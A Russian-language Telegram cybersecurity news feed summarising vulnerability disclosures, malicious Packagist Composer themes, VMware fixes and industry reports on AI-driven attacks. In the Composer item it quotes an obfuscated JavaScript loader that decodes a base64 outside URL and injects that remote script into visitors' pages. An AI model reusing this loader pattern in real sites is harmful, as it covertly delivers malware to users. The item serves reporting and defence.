CBUnit – главное в кибербезопасности
53 subscribers
369 photos
4.43K links
Краткое содержание новостей кибербезопасности

По вопросам: a@cbunit.ru
Download Telegram
Boeing 737 взломали через порт: атака Bus Driver подменяет данные полета

Источник: Kaspersky Daily
@cbunit
❢ Google Chromium V8: CISA добавила уязвимость подмены типов в каталог KEV

CISA добавила одну новую уязвимость в каталог известных эксплуатируемых уязвимостей (KEV) из-за доказательств её активной эксплуатации.

Уязвимость CVE-2026-85046 относится к Google Chromium V8 и представляет собой подмену типов. Этот тип уязвимостей является частым вектором атак и создаёт значительные риски для федеральных систем.

Google Chromium V8 Type Confusion Vulnerability
Уязвимость типа «подмена типов» (Type Confusion) в движке V8 браузера Google Chromium позволяет злоумышленникам манипулировать типами данных, что может привести к выполнению произвольного кода или другим опасным последствиям.

Источники: CISA · Help Net Security
@cbunit
Вредоносные темы Composer доставляют шпионское ПО для кражи криптокошельков с iPhone

▤ Разбор

Исследователи Socket обнаружили 13 вредоносных тем Composer на Packagist, которые внедряют JavaScript на сайты с фильмами и комиксами во Вьетнаме. Вредоносный код выполняет две операции: запускает цепочку мошенничества с рекламой и перенаправлением на азартные игры, а также устанавливает шпионское ПО на iPhone через эксплойт WebKit-to-kernel.

Apple подтвердила, что уязвимость ядра была исправлена до получения отчёта, а точки входа WebKit общедоступны и внесены в каталог CISA "Уязвимости, эксплуатируемые прямо сейчас" (KEV). Ранее исследователи Socket сообщали о шести темах под одним вендором (ophimcms), теперь подтверждённый набор расширен до 13 пакетов от пяти вендоров.

Что такое Composer
Composer — это инструмент управления зависимостями для PHP. Он позволяет разработчикам указывать, какие библиотеки нужны их проекту, и устанавливать их. Вредоносные темы Composer, обнаруженные исследователями, представляют собой пакеты, которые злоумышленники модифицировали, чтобы внедрить вредоносный JavaScript на сайты, использующие эти темы.

eval('window')['KuCbGF']=function(){ (function(u,r,w,d,f,c){
var x = iScfnleC; u = decodeURIComponent(x(u.replace(new RegExp(c+''+c,'g'),c)));
var s = d.createElement('script'); s.src=u; d.getElementsByTagName('head')[0].appendChild(s)
})('aHR0cHM6Ly91bmlvbi5tYWNvbXMubGEvanF1ZXJ5Lm1pbi0zLjYuOC5qcw==', ...) };
if( !(/^Mac|Win/.test(navigator.platform)) && (document.referrer.indexOf('.') !== -1) ) KuCbGF();


Источник: Socket
@cbunit
Минцифры предложило требования по защите от НСД к системам ОРД

Минцифры России разработало проект требований по защите от несанкционированного доступа к техническим и программным средствам информационных систем. Документ касается средств, используемых при проведении оперативно-разыскных мероприятий или обеспечении безопасности РФ.

Проект направлен на независимую антикоррупционную экспертизу. Он устанавливает правила защиты информации в системах, применяемых уполномоченными органами.

Источник: regulation.gov.ru
@cbunit
Broadcom закрыла критические VM-escape уязвимости в VMware Workstation и Fusion

Broadcom устранила две уязвимости в VMware Workstation и Fusion, позволяющие атакующему из виртуальной машины выполнить код на хосте. Одна из уязвимостей получила критический рейтинг.

Проблемы затрагивают версии VMware Workstation и Fusion 25H2 и 26H1. Обновление до версии 26H1u1 устраняет обе уязвимости. Обходных путей для эксплуатации не существует.

Что такое VM-escape
VM-escape — это тип атаки, при котором злоумышленник, получивший контроль над виртуальной машиной, может выйти за её пределы и получить доступ к хостовой системе или другим виртуальным машинам на том же оборудовании. Это происходит из-за ошибок в гипервизоре или компонентах, связывающих гостевую ОС с хостом.

Источники: Security Affairs · The Hacker News
@cbunit
Zscaler: ИИ-атаки ускоряются, готовность компаний — на нуле

▤ Разбор · 29 дней назад

Zscaler ThreatLabz опубликовал отчёт о готовности предприятий к автономным кибератакам с использованием передовых моделей ИИ.

Исследование выявило средний балл готовности 37 из 100, при этом оценка управления ИИ составила всего 2,1 из 20. Большинство организаций имеют уязвимые VPN-подключения, неинспектируемый трафик и широкие настройки сегментации, что создаёт благоприятные условия для атак.

Отчёт предлагает архитектурный подход к защите, основанный на принципах Zero Trust, для нейтрализации преимуществ ИИ в скорости атак. Рекомендуется в течение 90 дней усилить контроль над сетевыми устройствами, изолировать VPN, обеспечить идентификационную аутентификацию для ИИ-систем и увеличить долю инспектируемого зашифрованного трафика.

Что такое Frontier AI
Frontier AI — это передовые, высокопроизводительные фундаментальные модели, расширяющие границы искусственного интеллекта. В отличие от традиционного узкого ИИ, эти модели обладают сложными возможностями рассуждения, планирования и автономного выполнения задач. В руках злоумышленников они могут находить мелкие уязвимости и объединять их в полные пути атак со скоростью машины.

Источник: Zscaler ThreatLabz
@cbunit
MikroTik RouterOS: уязвимость нулевого дня позволяет получить root-доступ без пароля

Источник: Security Affairs
@cbunit
Forrester: микросегментация — ключ к Zero Trust и сдерживанию угроз

▤ Разбор · 17 дней назад

Forrester опубликовала отчёт о решениях для микросегментации сетей.

Исследование выявило три ключевые темы: микросегментация является неотъемлемой частью стратегии Zero Trust, новые возможности ИИ стимулируют интерес к ней как к средству сдерживания угроз, а решения помогают преодолеть разрыв между сетевыми и разработчиками.

Решения для микросегментации развиваются, предлагая ценность для различных команд и помогая справляться с техническим долгом и утерянными знаниями.

❝Any Zero Trust strategy without microsegmentation is incomplete.❞
— Forrester


Источник: Forrester
@cbunit
Рынок безопасности ИИ достигнет $4,8 млрд к 2027 году

▤ Разбор

Рынок безопасности искусственного интеллекта (ИИ) вырастет до $4,8 млрд к 2027 году. Рост составит 68,7% по сравнению с 2026 годом. К 2028 году рынок достигнет $7,7 млрд.

Ускорение роста связано с необходимостью защиты ИИ-систем от уязвимостей и киберугроз. Уязвимости в цепочках поставок и стороннем ПО в ИИ-проектах усугубляют риски. Без должного контроля ИИ-инициативы предприятий могут провалиться.

К 2029 году более половины успешных атак на ИИ-агентов будут использовать слабости контроля доступа и инъекции промптов. Организациям нужно выявлять, отслеживать и защищать ИИ-модели от этих угроз. Для сильной защиты требуется сочетание существующих систем безопасности со специализированными ИИ-инструментами.

Источник: Gartner
@cbunit
Gartner: ИИ-обнаружение уязвимостей — главный риск второго квартала 2026

▤ Разбор

Gartner выявил, что обнаружение киберуязвимостей с помощью ИИ стало главным риском второго квартала 2026 года. Скорость инноваций в ИИ позволяет находить и использовать уязвимости быстрее, чем когда-либо, требуя от организаций большей гибкости и проактивности.
Gartner рекомендует пересмотреть оценку влияния рисков, обновить аппетит к риску, усилить контроль над рисками третьих сторон и ускорить стратегии реагирования на киберинциденты для более быстрого устранения уязвимостей.

Что такое agentic AI
Agentic AI — это автономные системы, которые действуют за пределами организационного контроля. Их развитие представляет угрозу для целостности информации из-за ненадежных данных и контента, генерируемого ИИ.

Источник: Gartner
@cbunit
Каждая третья атака на компании начинается с подрядчика – исследование УЦСБ SOC

Исследование УЦСБ SOC выявило, что каждая третья атака на компании начинается через подрядчиков.

Доля атак через сторонних поставщиков услуг утроилась за год, достигнув 30%. Одновременно выросло число заражений шифровальщиками в промышленности в 2,3 раза и участились комбинированные атаки с шифрованием, кражей данных и DDoS.

Аналитики зафиксировали громкие утечки данных у российских компаний и появление нового формата шантажа — «тихий выкуп» за неразглашение инцидента регулятору.

Что такое УЦСБ SOC
УЦСБ SOC — это центр мониторинга, который анализирует инциденты кибербезопасности и сведения из открытых источников и теневого сегмента сети. Он изучает методы атак, выявляет тенденции и дает рекомендации по защите.

❝Нейросети резко упростили организацию атак — сегодня запустить цепочку компрометации способен даже злоумышленник без специальных навыков.❞
— Константин Мушовец


Источники: SecurityMedia · SecPost
@cbunit
Chamilo LMS: найдены 0-day уязвимости для RCE без аутентификации

Разбор целиком: cbunit.ru
Источник: Quarkslab
@cbunit